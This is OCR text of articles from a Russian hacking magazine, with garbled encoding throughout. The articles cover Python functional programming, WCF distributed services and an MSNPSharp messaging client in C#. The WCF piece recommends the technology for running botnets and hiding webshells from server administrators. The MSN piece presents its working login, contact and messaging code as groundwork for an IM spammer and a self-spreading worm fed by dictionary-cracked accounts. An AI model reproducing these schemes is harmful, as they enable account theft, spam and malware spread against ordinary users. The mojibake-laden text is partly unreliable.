объектами. Линуксоидам помощь не нужна :). map(sq. поскольку полностью функциональный язык — довольно специфичная и редко используемая штука.] sum = 0 for element in a: sum += element ** 2 print sum Функциональный Питон data = [. Ëîãè÷åñêîå ïðîãðàììèðîâàíèå «Отвечаем на вопрос поиском решения».ibm. data)) Оба примера на питоне. λ-èñ÷èñëåíèÿ Lambda исчисления — это математическая концепция. λ-исчисления основываются на двух операциях: аппликация и абстракция. Функциональное программирование.>> coding DVD dvd На диск я положил свежие дистрибутивы питона для виндусоидов.] sq = lambda x: x**2 sum = lambda x.wikipedia. ÏÈÒÎÍ Â ÄÅÉÑÒÂÈÈ Оказывается. sameweight(duck. Функции map. Оказалось. Языки: Prolog Логическое программирование — довольно специфическая штука. которая подразумевает. Достаточно простого примера: Иллюстрация к фильму Монти Пайтона на Prolog’е {çàäàåì ïðàâèëà} witch(X) <= burns(X) and female(X). хотя я и не включил его в список функциональных языков. моделируя взаимодействия в реальном мире». достаточно украсить императивный код элементами функционального. {çàäàåì âîïðîñ} ? witch(girl). На ООП построены практически все современные бизнеспроцессы.girl). Выглядит гружено! Абсолютно непонятная начинающему программисту парадигма. Посчитаем сумму квадратов элементов массива «data» императивно и функционально: Императивный Питон data = [. что функции могут принимать в качестве аргументов и возвращать другие функции. Это сродни математике — мы долго пишем на доске формулу f(x). но даже он не был полностью функциональным (ставит в тупик. так что давай уже чтонибудь напишем. а последовательность действий.. reduce — это и есть те самые функции 109 . как каждый программист по определению знаком с императивным и объектно-ориентированным программированием.python... Первым функциональным языком был Lisp. но.com/ developerworks/ library/l-prog. Такие функции называются функциями высших порядков.y: x+y print reduce(sum. интересная и интуитивно понятная. {çàäàåì íàáëþäåíèÿ} female(girl).

и если ты перешел от ИП к ООП. Применение чистых функций дает нам ряд преимуществ: • Во-первых. Но больше всего выгоды мы получаем. В этом маленьком примерчике также уместилась еще пара интересных определений функционального программирования — замыкание и карринг.. В следующие разы можно использовать кэшированное значение. то ее можно посчитать 110 Ñïèñî÷íûå âûðàæåíèÿ è óñëîâíûå îïåðàòîðû Чтобы жизнь и программирование показались тебе медом. если не избавиться. функции создают новые функции на основе своих аргументов. В принципе. который работает не только с переменными. Также. и именно сочетание ООП и ФП дает нам этот уровень. когда пишем «чистые функции». чем он выше — тем лучше. то мы уменьшаем количество ошибок. ты его уже видел в предыдущем примере — это adds = [add(x) for x in xrange(100)]. Здесь мы сразу создаем и инициализируем список значениями функций. В результате несколько «степеней свободы» получает не только программист. она не зависит от своего окружения и не изменяет его состояния. связанных с нежелательными значениями этих самых переменных. В заключение скажу пару слов об уровне абстракции. необязательно полностью следовать функциональной парадигме. Однако. зависящие только от аргументов и других функций. каждая из которых прибавляет к аргументу определенное число. Таким образом. Вместе с количеством ошибок мы уменьшаем и время отладки программы. если функции не зависят от переменных окружения. Что мы и сделали в примере. надстройка над императивной парадигмой. берущую свои аргументы по одному. Lambda-абстракция def add(n): return lambda x: x + n adds = [add(x) for x in xrange(100)] только один раз. ООП — это. Замыкание — это определение функции. и ничего не сказал про ООП и ФП. да и дебагить такие функции гораздо проще. Как мы уже выяснили. Если функция зависит только от аргументов. только на локальном уровне. что дает нам еще несколько «степеней свободы».CODING Поддержка парадигм в языках программирования высших порядков. Яркий пример: print length([5. разработчики питона придумали специальный «подслащающий» синтаксис.. Но ленивый компилятор питона просто не станет вычислять значения каждого элемента списка. Таким образом. Для увеличения производительности в ФП также используются ленивые вычисления. с помощью инструментария питона можно превратить громоздкий императивный кусок кода в красивый и функциональный. то уж точно свести к минимуму. Удобно. то компилятору есть где разгуляться. как операторы and и or. мы можем написать код. Так вот. По идее. но и компилятор. В нашем примере это lambda x. чтобы упростить себе жизнь. правда? Еще есть такая штука. 3+2]). ×èñòûå ôóíêöèè è ëåíèâûé êîìïèëÿòîð Императивные функции могут изменять внешние (глобальные) переменные. Он позволяет избавиться от условных операторов и циклов… ну. С помощью этого приема мы делаем что-то похожее на использование глобальных переменных. и это значит. который буржуи так и называют — «syntactic sugar». а значит. что функция может возвращать различные значения при одних и тех же значениях аргумента на разных стадиях выполнения программы. • Во-вторых. Такое утверждение совсем не подходит для функциональной парадигмы. которые позволяют обходиться без громоздких конструкций типа if-elif-else. если функции не зависят друг от друга. за что они и получили прозвище «чистые функции». зависящей от внутреннего состояния другой функции. если функции независимы. adds[34](5) Здесь мы создали список функций. в функциональной парадигме можно распоряжаться функциями как угодно.z XÀÊÅÐ 10 /141/ 10 . 4/0.append(-x) print L Функциональный код print [x**2>=50 and x or -x for x in xrange(10) if x%2==0] ÈÒÎÃÈ Как ты уже понял. Карринг — это преобразование функции от пары аргументов в функцию. но и с функциями. Что касается абстракции — здесь наоборот. я все время говорил про императивную парадигму. Чистая функция — это функция без побочных эффектов.append(x) else: L. Нужна длина списка — пожалуйста! Те же принципы используются и для других языковых конструкций. их можно менять местами и даже автоматически распараллеливать. фактически. Императивный код L = [] for x in xrange(10): if x % 2 == 0: if x**2>=50: L. только у нас получился сразу массив таких функций. достаточно умело использовать ее в сочетании с императивной. на выходе мы должны получить ошибку деления на ноль. Что ж. то следующим шагом должно быть применение ФП в ООП. так как его об этом не просили. Здесь функции рассматриваются как математические. которые «апплицируют» (или применяют) переданную в качестве аргумента функцию к каждому элементу списка (для map) или каждой последовательной паре элементов списка (для reduce).

Реклама .

которая имеет модное название «cloud computing» — служба предоставляется как сервис. вошли в состав фреймворка Windows Communication Foundation.NET Framework. Эта технология также обеспечивает поддержку удобной работы в веб-среде.NET Framework. Разработчику предоставляется единая среда создания. поддержки и развертывания веб-служб.com. Целый набор технологий построения безопасных систем с распределенной архитектурой. Таким образом. Cloud Computing äîñòóïåí ìàññàì. сочетает в себе необходимые для создания многофункциональных веб-приложений технологии обработки данных: поддержка команд получения/изменения/вызова данных (GET и POST). который упрощает разработку сетевых приложений и предоставляет широкий инструментарий для обмена данными между клиентской и серверной частью.NET Remoting — принципу построения сетевых приложений. на основе которого мы организовали полноценную систему распределенных вычислений. Модель программирования. Однако Microsoft не стала ограничивать фантазию разработчика одним «ремоутингом». Более того.CODING Денис «c0n Difesa» Макрушин condifesa@gmail. каждая из которых функционирует по принципу «доступна всем». то есть имеет полностью открытые интерфейсы для функционирования с другими системами без каких- 112 либо ограничений к своей внутренней архитектуре. прослеживается связь с технологией. входит в . à ðàñïðåäåëåííàÿ àðõèòåêòóðà òåïåðü ÿâëÿåòñÿ åñòåñòâåííîé ïîòðåáíîñòüþ íå òîëüêî êðóïíûõ îðãàíèçàöèé. целостности и аутентификации. Ñåãîäíÿ ìû ðàññìîòðèì ñèñòåìó áûñòðîãî ðàçâåðòûâàíèÿ ðàñïðåäåëåííûõ ïðèëîæåíèé â äîìàøíèõ óñëîâèÿõ. предоставляются компьютерные ресурсы и вычислительные мощности.N Ïÿòü «êèòîâ» WCF — ñîâîêóïíîñòü ìîùíåéøèõ òåõíîëîãèé Messaging g in t o m e R Windows Communication Foundation (WCF) WTF WCF? Web Servic es WS E Windows Communication Foundation: ñëîæíûå òðàíçàêöèîííûå ñèñòåìû ïî-áûñòðîìó Áóäóùåå íàñòàëî. В рамках этой статьи мы продолжим знакомиться со спектром технологий платформы . в том числе и концепция упомянутой Remoting. Теперь проблема разграничения доступа к административной части твоей бот-сети не ограничивается банальной передачей пары «логин:пароль» авторизационной форме. С ростом функционала проектируемого приложения растет количество его функциональных элементов.ru se rpri Entervices Se et . íî è ñàìûõ ÷òî íè íà åñòü ðÿäîâûõ ãðàæäàí. И кто сказал. объекты AJAX и JSON. роль которых уже далека от классического представления. но все же остается ограниченным рамками архитектуры «клиент-сервер». сообщения SOAP). Одна из прошлых статей была посвящена . процесс авторизации может XÀÊÅÐ 10 /141/ 10 . что вычисления в облаке — удел крупных компаний? Однако инструментарий для программирования систем распределенных транзакций — не единственная область WCF. а. http://defec. Имеются также средства обеспечения конфиденциальности. поддержка нескольких различных типов данных (документы XML. который. в свою очередь. обработка унифицированных локаторов ресурсов (URI). значит. которая гордо называется WCF WEB HTTP.

servicesite. Рассмотрим организацию SOAP на простом примере. Одной из реализаций данного подхода является уже упомянутая технология . данные. предоставляющий методы с описанной в специальном формате структурой.xakep. Пусть имеется некоторый «Сервис». В нашем случае Сервис предоставляет метод «GetBalance(int AccountID)» получения баланса на запрашиваемом аккаунте. Кстати говоря. полученные по указанному URL. так как SOAP — классический подход. ÄÂÀ ÑÀÏÎÃÀ… Для начала ознакомимся с двумя фундаментальными методиками организации любой распределенки. требующих отдельного внимания. например: www. организующего распределенный поиск заветной «строчки» по известному MD5-хешу — задачи. Рекомендую разобраться в значении каждой строчки кода. грамотно спроектированная политика разграничения доступа (бот. а на доступе к необходимым ресурсам с помощью их унифицированных локаторов. Клиент генерирует специальный запрос и отправляет его в составе HTTP-пакета Сервису: Структура SOAP-запроса //ñòàíäàðòíûå HTTP-çàãîëîâêè … SOAPAction: GetBalance … //SOAP-êîíâåðò <soap: Envelope xmlns: soap …> //òåëî SOAP-çàïðîñà <soap: Body> <GetBalance xmlns = …> <Account>2</Account> </GetBalance> </soap: Body> </soap: Envelope> Формат SOAP-ответа формируется аналогичным образом. чего не скажешь о SOAP-аналоге. Подход REST (Representational State Transfer) — альтернатива SOAP. как HTTP. на особенностях решаемой задачи. рассмотрим подходы к реализации этих архитектур. прежде всего. требующие индивидуального подхода. какой набор инструментов предоставляется разработчику. Короче говоря. ведь так или иначе клиент получает необходимые ему данные. где хранится огромное количество информации по WCF. HTTP://WWW links • www. Прежде чем приступить к обзору средств WCF для построения приложений с распределенной архитектурой. Каждый объект кодируется уникальным URL. в общем случае представляющий собой обмен сообщениями в распределенной инфраструктуре запросы могут фиксироваться исключительно на стороне веб-службы. и абсолютно нелегального ботнета.NET Remoting: программим системы распределенных grid-вычислений». • www. На первый взгляд разница несущественна. • http://defec. Для вызова методов и получения/изменения каких-либо данных происходит XÀÊÅÐ 10 /141/ 10 Схема организации подхода RESP обращение к сервису с помощью стандартных HTTPглаголов (GET. Например. Данный архитектурный стиль построен на таких стандартах. называемых URI.ru — мой ресурс. как в SOAP. DVD dvd На диске тебя ждет пример клиентсервисного приложения. правоохранительный орган) в системе с распределенной архитектурой — один из ключевых аспектов. в общем случае представляющий собой обмен сообщениями в распределенной инфраструктуре. REST в этом плане более практичен и не требует специальных оптимизационных мероприятий. SOAP (Simple Object Access Protocol) — классический подход. гость. Теперь вернемся непосредственно к WCF и посмотрим. занимающейся поиском коллизии MD5-хешей. Акцент в этом подходе сделан не на исполнении удаленных сервисов. Еще один аргумент не в пользу SOAP: обязательный разбор клиентом полученного XML-кода требует определенных трудозатрат.NET Remoting. где происходит непосредственный обмен пакетами между клиентской и серверной частью. Непосредственное обращение к ресурсам сервиса с помощью REST-подхода позволяет поднять степень конфиденциальности клиентской стороны.>> coding Взаимодействие клиента и сервиса основано на трех элементах оконечной точки проходить вообще без классической схемы с паролями. при повторном обращении к ним могут быть кэшированы. 113 . PUT. В распоряжении архитектора распределенных систем имеются два подхода: SOAP и REST.ru/ — официальный ресурс «мелокомягких». XML.techdays. организация grid-системы.ru/ post/52434/— статья «. POST. Таким образом. DELETE). выбор того или иного подхода должен быть основан. URI. админ.com/Accounts/2. где ты можешь задать вопросы и поделиться идеями. однако результаты проектирования системы в соответствии с этими подходами кардинально отличаются. что плохо сказывается на масштабируемости задачи.

а вот его реализация: Реализация Контракта public class AddService : AddIntPoint { public int Add(int x. определяющих то. Что самое примечательное — ты не будешь замечать. имеющий в своем распоряжении схему обращения к методам сервиса. например..CODING Элементы типа «Контакт» представляют собой совокупность операций. соответствующим образом обрабатывает (согласно инструкциям метода). int y). и ждать заветного результата. Автоматически создается прокси (а вот и концепция Remoting’а!) и производится передача ему запроса (списка параметров для обращения к методу). так как WCF-прокси сам организует соединение с удаленной службой и аккуратно передаст тебе результаты выполнения удаленного метода. Следующий код демонстрирует определение оконечной точки: Определение Оконечной Точки public class WCFServiceApp { //ìåòîä îïðåäåëåíèÿ îêîíå÷íîé òî÷êè è çàïóñêà ñåðâèñà public void DefineEndpointImperatively() {. генерирует запрос к какому-либо методу. Ты можешь создать абсолютно любой метод. TCP. будет ли проверяться надежность передачи сообщения (о чем свидетельствует присутствие элемента ReliableSessionBindingElement) и включена ли безопасность передачи SOAP-сообщений (наличие элемента SecurityBindingElement). Оконечная точка — «орган» связи сервиса с внешним миром. добавляет необходимые атрибуты безопасности. метод класса. WCF-прокси кодирует эти параметры. Однако. если использовать только часть определенных слоев. может иметь ряд атрибутов. Каждый из этих элементов. проще говоря.. операция — не что иное. как обмен сообщениями (запрос/ответ) или их односторонняя отправка. Протоколом передачи Обмен данными между WCF-клиентом и WCF-сервисом основан на так называемых «слоях» . 114 Рассмотрим создание оконечной точки WCF-службы для того. если соответствующие опции заранее были активированы в конфигурационном файле. что оконечная точка будет сообщать внешней среде. то можно организовать и REST-подход.} //ýêâèâàëåíòíàÿ îêîíå÷íàÿ òî÷êà â êîíôèãóðàöèîííîì ôàéëå public void DefineEndpointInConfig() {. По сути. 2. Рассмотрим описанные действия на примере создания метода службы. и возвращает результат клиенту. который принимает два целых числа и отправляет их сумму обратно во внешнюю среду: Прототип Контракта [ServiceContract] public interface AddIntPoint { [OperationContract] int Add(int x. также должен помечаться атрибутом OperationContractAttribute..AddServiceEndpoint( typeof(AddIntPoint). Адрес (Address). PasswordCrack (string MD5hash). данных может выступать один из стандартных протоколов: HTTP. sh. MSMQ и др. TcpTransportBindingElement — передача по протоколу TCP). Клиент. Контракт (Contract). Элементы типа «Связывание» определяют. чтобы последняя могла предоставлять потенциальным клиентам свои методы. где происходят расчеты (на локальной машине или где-то на сервере в Зимбабве). Именно для предоставления адресной информации предоставляемых ресурсов используется URI (унифицированный локатор ресурсов. В Windows Communication Foundation есть три ключевых понятия: 1. Объявление Контакта заключается в создании класса и привязки к нему атрибута ServiceContractAttribute (и тут Remoting). как ни странно. ÅÑÒÜ ÊÎÍÒÀÊÒ! Схема организации подхода SOAP ÑÊÂÎÇÜ ÏÐÈÇÌÓ MICROSOFT Обмен данными между WCF-клиентом и WCF-сервисом основан на так называемых «слоях». который будет передавать обработанные данные во внешний мир. Связывание (Binding).. отправляет в транспортный канал. то есть какие протоколы будут использоваться на транспортном уровне (например. Все гениальное просто. уточняющих их специфику.. как будет осуществляться взаимодействие с точкой. int y) { return x + y. } Как можно догадаться из определения Контакта — в нем должно произойти сложение двух чисел. } } Теперь класс AddService является классом WCF-сервиса и может быть вызван клиентской частью удаленно. который реализует нужный функционал.. в свою очередь. Далее сервис в обратном порядке извлекает этот запрос.} } В функции DefineEndpointImperatively() объявляется экземпляр класса. 3. Эти три атрибута определяют понятие так называемой «оконечной точки» сервиса. ServiceHost sh = new ServiceHost(typeof(AddService)). В свою очередь. добавляется точка подключения по протоколу HTTP и происходит запуск службы: . их адрес). определяет адрес нахождения сервиса. Ее «Адрес». XÀÊÅÐ 10 /141/ 10 . WCF «по умолчанию» основан на SOAP. и.

например. почему? Потому что ты сам делаешь для этого все возможное: обращаясь каждый раз к одному и тому же сомнительному скрипту по несколько раз за день. которая называется «WCF-сервис и сорок разбойников». "http://localhost/AddService/Ep1"). Вот. ÇÀ ÃÎÐÈÇÎÍÒÎÌ? К спектру технологий WCF можно подойти с разных позиций: разработка. позволяет легко активировать/деактивировать дополнительные опции сервиса (настройки безопасности.Add(35. может быть повседневные вещи в распределенном состоянии окажутся намного более удобными. предоставляют возможность использовать несколько различных каналов передачи данных (транспортов) и методов. взгляни на свои вебшеллы. поступающие с твоего основного ботнета и ботнета. если ты раскидаешь функционал своего вебшелла по его нескольким неприметным уголкам обращение его частям. Да мы такой задачи перед собой и не ставили. Распределение может быть полезно в любой окружающей нас области. ты можешь синхронизировать данные.. Свои я уже реализовал и намерен поделиться ими с тобой на страницах нашего журнала. работающих исключительно под его управлением).). которой касается Windows Communication Foundation. как быстро их палят и прикрывают. насколько возрастет степень твоей анонимности и конфиденциальность операций на взломанном сервере. Задумайся. К не менее приятным особенностям WCF-сервисов также стоит отнести полную независимость от IIS-сервера (в этом XÀÊÅÐ 10 /141/ 10 заключается отличие от обычных веб-сервисов. Кто знает. ты оставляешь в логах веб-сервера избыточную информацию для бдительного администратора.п.Open(). Ознакомившись с теоретической составляющей и бегло освоив базовые конструкции и детали конфигурации сервисной части.. То есть мы можем поднять консольное приложение в виде сервиса. Предоставленный материал представляет собой лишь вводную часть к той длинной истории. Например. Конфигурационный файл сервиса. } } Аналогичным образом клиент хранит свою оконечную точку для поддержки связи с оконечной точной сервиса. расположенный вне исходного кода. sh. ×ÒÎ ÆÅ ÒÀÌ. 7). и ты скажешь: «Как же я раньше до этого не додумался?». невозможно в рамках одной статьи. проверка целостности передаваемых данных и т. Вспомни. основанного исключительно на мобильных платформах. работающего по HTTPпротоколу. Таким образом ты потенциально расширяешь спектр зараженных машин. Рассмотрев детали быстрой организации клиент-сервисной (именно сервисной) архитектуры. коими выступают придуманные тобою сервисы. ты получаешь в свое распоряжение мощный инструмент реализации своих самых распределенных идей.z 115 . сервисы могут предоставлять целую коллекцию оконечных точек. А теперь представь. а значит. Следующий фрагмент кода иллюстрирует процесс отправки сообщений клиентом оконечной точке AddIntPoint сервиса: public class WCFClientApp { //èíèöèàëèçàöèÿ êàíàëà ïåðåäà÷è äàííûõ public void SendMessageToEndpoint() { MathProxy proxy = new MathProxy(). масштабируемость.>> coding Обмен сообщениями между Клиентом и Сервисом средствами WCF new WSHttpBinding(). int result = proxy. безопасность. Это дает возможность абстрагироваться от канала передачи данных и расширить множество потенциальных клиентских платформ за счет использования различных протоколов передачи данных. . мы создали плацдарм для дальнейших исследований и непосредственного испытания майкрософтоской технологии в боевых условиях. Кстати говоря. Охватить детали той или иной области.

потому что MSN’у пока доверяют. который создается банально и без параметров: Messenger messenger = new Messenger(). что если бы класс работал в синхронном режиме. ïðÿìî êàê XÀÊÅÐ 10 /141/ 10 . но через полгодика наткнулся на библиотеку MSNPSharp (http://code. com/p/msnp-sharp/). а так — только класс. работающих вот так: 1. и вполне успешно. например. тем проще найти ламера с примитивным паролем). скачал последнюю версию и разобрался с ней в два счета. что в интернете не так уж и много информации по этой теме. Некоторые команды выполняются очень долго. êîìïüþòåðàõ). из чего это существо сделано — я беседовал с сотрудниками компании. Событий у класса довольно много. где у людей есть деньги) — изучай их ПО. È äàæå òå. Если кто-то повелся и запустил файл. Когда я впервые (это было довольно давно) решил разобраться с работой протокола Microsoft Messenger. • Nameserver. которая будет подбирать пароли к аккаунтам из списка по словарю. ÀÑÈÍÕÐÎÍÍÀß ÌÎÄÅËÜ Все в библиотеке крутится вокруг класса Messenger. Äàæå òå. Ну.flenov. • Nameserver. искал в интернете блоги программистов. И за это разработчикам MSNPSharp однозначно нужно пожать руку. При этом сама Microsoft по ходу пьесы притворилась Буратино.SignedIn — ìû âîøëè â ñèñòåìó. 3. и жди. Такая рассылка отработает намного эффективнее. êîãäà ñîåäèíåíèå óäà÷íî óñòàíîâëåíî. вроде спамеров и червяков. Класс работает с протоколом в асинхронном режиме. затрагивающий цивилизованные страны (те. который должен был рассылать сообщения на MSN-клиенты. то оказалось. ÊÀÊ ÎÍÎ ÐÀÁÎÒÀÅÒ? Из этого следует простой вывод — хочешь внедриться в спам-бизнес. Вот минимальный набор. то можно прочитать содержимое контактов и разослать файл от имени ламера. но вот недавно на работе мне пришлось писать модуль. àñüêà. то на нас свалилась бы куча проблем по асинхронизации. 2. ÏÎËÇÓ×Àß ÒÂÀÐÜ Точек приложения для этой библиотеки много — от легального софта до реализации различных противозаконных программулин.ConnectionEstablished — ãåíåðèðóåòñÿ. Долгое время эта библиотека лежала у меня на диске мертвым грузом. или тем. êòî ñèäÿò íà ìàêàõ (â ñìûñëå. то этот файл рассылает себя дальше. Я тут же вспомнил про MSNPSharp. Просто вызывай нужную функцию. ïîëüçóþòñÿ ýòèì ìåññåíäæåðîì. Если кто-то отзывается. MSN.CODING Михаил Фленов www. Если выполнять операцию синхронно. просил их поделиться знаниями. когда она сгенерит соответствующее событие. Дело в том. Если аккаунт взломан (а чем больше аккаунтов. в момент скачивания контактов класс может капитально заснуть на несколько секунд. À â ÑØÀ? Êîíå÷íî. Например. В свое время таким же образом распространялись вирусы по почте. работающих в MS.info ÑÀÌÎÏÀËÜÍÛÉ MSN-ÊËÈÅÍÒ ÍÀ ÑÈØÀÐÏÅ Ãîòîâèì ïî÷âó äëÿ ñîçäàíèÿ àíòèàìåðèêàíñêîãî IM-ñïàìåðà Êàêîé ñàìûé ïîïóëÿðíûé IM-êëèåíò â Ðîññèè? Êîíå÷íî æå. òîæå ïîëüçóþòñÿ ìàéêðîñîôòîâñêîé ñèñòåìîé áûñòðûõ ñîîáùåíèé. то пытаемся заставить пользователя принять и запустить файл. который может пригодиться в реальной жизни: • NameserverProcessor. Все бесполезно. знай их протоколы передачи данных. Пытаемся разослать приглашения на общения. 116 Еще один сценарий — написать программу.google. то в спячку ушло бы все приложение. êòî ñèäÿò íà ìàêàõ îïèéíûõ.SignedOff — óäà÷íî âûøëè. На некоторое время я оставил попытки узнать про протокол.

>> coding

новое — это хорошо забытое старое. Вспомним, как работал один из
самых нашумевших червей. Для взлома аккаунтов он использовал подбор паролей по словарю, который брал из *nix-системы. Так как в те
времена о безопасности мало думали даже специалисты, червь удачно
ломал системы.
Сейчас о безопасности думают больше, но только специалисты и продвинутые пользователи. Ламеров на просторах нашей Сети все еще
очень много, поэтому можно попробовать повторить взлом. Проникая
на компьютер, можно попытаться взломать MSN-аккаунты банальным
перебором всех почтовых ящиков, которые есть в адресной книге. Если
что-то взломалось, то подключаемся от имени лохоюзера и рассылаем
себя других лохоюзерам Сети. Известный факт — когда файлы приходят
от друзей, то их запускают намного чаще. Итак, чтобы отправить кому-то
сообщение, мы сначала должны пригласить его в свой список друзейтоварищей. Все, что касается адресной книги MSN, находится в классе
Nameserver мессенджера. Чтобы пригласить нового друга, вызываем
метод AddNewContact сервиса ContactService. Запутался? Проще один
раз показать, чем десять раз рассказать:
Messenger.Nameserver.ContactService.
AddNewContact("pamela_anderson@hotmail.com");

Теперь о том, как получить список контактов. Контакты находятся в свойстве ContactList, которое является достаточно серьезным классом. Если
тебе нужны все контакты, то обращайся к коллекции All (ContactList.All).
Помимо этого можно увидеть следующие типы контактов:
• Allowed — ðàçðåøåííûå êîíòàêòû;
• BlockedList — çäåñü ìû ìîæåì óâèäåòü þçåðîâ, êîòîðûõ
çàáëîêèðîâàëè.

Самый популярный в Америке мессенджер
Âèííè-Ïóõ, ó êîòîðîãî âñå ïðåêðàñíî âõîäèò è âûõîäèò;
• Nameserver.AuthenticationError — àâòîðèçàöèÿ íå ïðîøëà;
• ConversationCreated — íà÷àòî îáùåíèå ñ óäàëåííûì
êëèåíòîì.

Достаточно установить обработчик на каждое событие, и можно начинать соединение с сервером. Хотя подожди. Сначала нужно указать свои
данные — те, с которыми мы подключаемся к серверу. У класса мессенджера есть свойство Credentials, которое имеет одноименный тип.
У конструктора класса Credentials есть два параметра — почтовый ящик
и пароль в чистом и красивом виде. Итак, параметры учетной записи,
с помощью которой мы будем подключаться к серверу сообщений, прописываем следующим образом:

Сам по себе список не синхронизируется с сервером, и сразу после
подключения все списки контактов будут пустыми. Дело в том, что эта
операция происходит довольно медленно. Если нужно забрать с сервера свои контакты, то можно изменить свойство AutoSynchronize на true:
messenger.Nameserver.AutoSynchronize = true;

Если же скорость старта тебя особенно не волнует, то изменение
свойства AutoSynchronize можно поместить в обработчике события
ConnectionEstablished. Это вполне логично — сразу после установки
подключения синхронизировать контакты.

ÎÁÙÅÍÈÅ

Когда мы вошли в систему, то есть произошло событие SignedIn, мы
можем изменять состояние и начинать общаться. Чтобы показать, что
ты в сети и готов к общению, измени свое состояние на online следующим образом:
messenger.Owner.Status = PresenceStatus.Online;

messenger.Credentials = new Credentials(
"youaccount@hotmail.com", "qwerty");

Если ты подцепился на все нужные нам обработчики событий и указал
учетную запись, можно запускать процесс коннекта к серверу методом
Connect();.

ÏÎÁÎËÒÀÅÌ

Разговоры между незнакомыми абонентами категорически запрещены, и этот запрет представляет собой реальное западло для хакера. Чтобы кого-то вызвать на серьезный и жесткий разговор, нужно
сначала направить приглашение, и только если твой invite приняли,
можно посылать сообщения. Такой протокол должен предотвращать
бесконтрольные рассылки заразы, которые происходят в классической
e-почте. Правда, теоретически вполне реально написать червя, который будет распространяться по алгоритму Морриса, ведь все хорошее
XÀÊÅÐ 10 /141/ 10

Разумеется, для спама и прочих сомнительных с точки зрения законности мероприятий статус значения не имеет — сообщения можно слать
и при PresenceStatus.Busy. Лично мне кажется, что с психологической
точки зрения занятость даже более предпочтительна — если собеседник занят, но отправляет тебе что-то, ты не будешь приставать к нему с
лишними вопросами о том, что это и зачем.
Теперь сама отправка сообщения. Этот процесс чуть более запутан.
Для этого нужно создать новое общение, за которое отвечает класс
Conversation:
Conversation conversation =
messenger.CreateConversation();

Теперь просто дожидаемся, когда сработает событие
ConversationCreated. А вот уже когда новое общение создано, мы

117

CODING

Сайт библиотеки MSNPSharp

должны найти в списке контактов человека, которому хотим отправить
послание, и пригласить его на разговор.
Допустим, что messenger-аккаунт человека, которому мы хотим отправить сообщение, находится в строковой переменной MsnAccountTo:
private void messenger_ConversationCreated(
object sender, ConversationCreatedEventArgs e)
{
if (e.Initiator != null)
{
foreach (MSNPSharp.Contact
contact in messenger.ContactList.All)
{
if (contact.Mail == MsnAccountTo)
{
e.Conversation.ContactJoined +=
new EventHandler<ContactEventArgs>(
ContactJoined);
e.Conversation.Invite(contact);
return;
}
}
messenger.Nameserver.ContactService.AddNewContact
(MsnAccountTo);
}
}

Код банален — мы просто ищем контакт в списке всех, кого мы знаем.
Если чей-то почтовый ящик совпадает с тем, кого мы хотим нежно и
ласково полюбить, то вызываем этого человека на разговор. Созданная
беседа покоится в свойстве Conversation второго параметра события.
Мы должны подписаться на событие ContactJoined этого класса общения, чтобы узнать, когда удаленный пользователь готов пообщаться:
e.Conversation.ContactJoined +=
new EventHandler<ContactEventArgs>(ContactJoined);

А приглашение на этот разговор делается вызовом метода Invite и указанием ящика бедолаги:
e.Conversation.Invite(contact);

118

Тут нужно быть внимательным и аккуратным. Событие ConversationCreated может вызываться несколько раз. Я не понял, с какого
перепуга это происходит, но факт есть факт — приходится гасить повторяющуюся генерацию события. Это можно сделать, например, вводя
дополнительную булеву переменную, которая будет устанавливаться при
создании общения и гаситься после обработки события. Если переменная не установлена, то игнорировать событие.
Но и это еще не все. Теперь в недрах библиотеки снова начинается
асинхронный для нас процесс, по завершению которого вызывается
событие ContactJoined. И вот в нем мы уже можем отправить пользователю сообщение. Следующий пример показывает, как отправить простое текстовое послание:
private void ContactJoined(object sender,
ContactEventArgs e)
{
TextMessage message =
new TextMessage(currentmessage);
(sender as Conversation).SendTextMessage(message);
}

В первой строке мы подготавливаем текстовое сообщение к отправке.
Оно должно иметь тип класса TextMessage. Конструктору этого класса
мы банально передаем строку текста.
Так как событие генерирует класс Conversation, то первый параметр как
раз на него и указывает, и мы можем его использовать. Например, для
вызова метода SendTextMessage с целью непосредственной отправки
сообщения.
На уже созданном классе Conversation и пришедшем на разговор удаленным клиентом, можно отсылать несколько сообщений подряд. Если
пользователь не в сети, Conversation все равно будет создан.

ÈÒÎÃÎ

Вот и все. Еще раз повторю, что MSN реально популярен в США —
лишь однажды я видел контору, в которой использовали Skype, но при
ближайшем рассмотрении оказалось, что большинство ее программистов сидят в Петербурге. На диске к журналу ты найдешь небольшой
класс-помощник, который упрощает работу с библиотекой и сводит
отправку сообщений к вызову всего одного метода, если не считать конструктора, который вызывается автоматом при инициализации объекта.
В большинстве простых ситуаций этого класса будет достаточно. z
XÀÊÅÐ 10 /141/ 10

CODING
Александр Эккерт stannic.man@gmail.com

КОДЕРСКИЕ
ТИПСЫ
И
ТРИКСЫ
Ñïåöâûïóñê: òðþêè äëÿ (íå î÷åíü) íà÷èíàþùèõ
ñèñòåìùèêîâ

Õî÷åøü ñòàòü óâåðåííûì ïîëüçîâàòåëåì ñâîåãî êîìïüþòåðà? Ëåãêî
íàõîäèòü êíîïêó «Ïóñê» è çàïóñêàòü èãðó «Ñàïåð»? Õî÷åøü, ÷òîáû
òâîè äðóçüÿ çàâèñòëèâî ñìîòðåëè íà òåáÿ, ïîòîìó ÷òî òû íà÷àë
ïîëüçîâàòüñÿ çàâåòíûìè «ãîðÿ÷èìè êëàâèøàìè» Alt+TAB? Åñëè äà,
òî ñêàæè ìíå, çà÷åì òû âçÿë æóðíàë ñòàðøåãî áðàòà? Ðàçâå îí äëÿ
òåáÿ åãî ïîêóïàë? Îòäàé æóðíàë íåìåäëåííî!
Отдал? Хорошо. В этой статье мы будем распиливать циркулярной
пилой такие вещи, как Driver Signature Enforcement, немало озаботившую в свое время драйверописателей, а также TLS — Thread
Local Storage, этакого неотъемлемого и скрытого соседа любого
PE-файла.

Êîå-÷òî î Driver Signature
Enforcement

Как известно, начиная с Windows Vista, парни из Microsoft серьезно
озаботились загрузкой неподписанных (читай — чужих) драйверов в
систему (для Vista речь идет о 64-битной версии). В первую очередь это
было сделано, наверное, для защиты системы от руткитов, основная
боевая часть которых зависит от драйвера ядра. В результате это привело к всевозможным проблемам, доставшимся системным разработчикам, занятым в разработке драйверов. Теперь для успешной загрузки
драйвера в Windows Vista/7 нужна была цифровая подпись, а ее нужно
было покупать за немаленькие деньги у таких компаний, как Verisign или
Thawte.
Разработчики руткитов из-за этих новостей несильно огорчились. Вместо того, чтобы огорчаться, они начали искать «левые» пути и лазейки,
позволяющие грузить неподписанные драйвера в систему. У них это,
традиционно, получилось, и первой среди них была наша любимая
красавица — Рутковска.
Я не буду рассказывать тебе об этих способах, о них ты вполне сможешь
прочесть в интернете. Вместо того, чтобы есть чужую рыбу, мы лучше
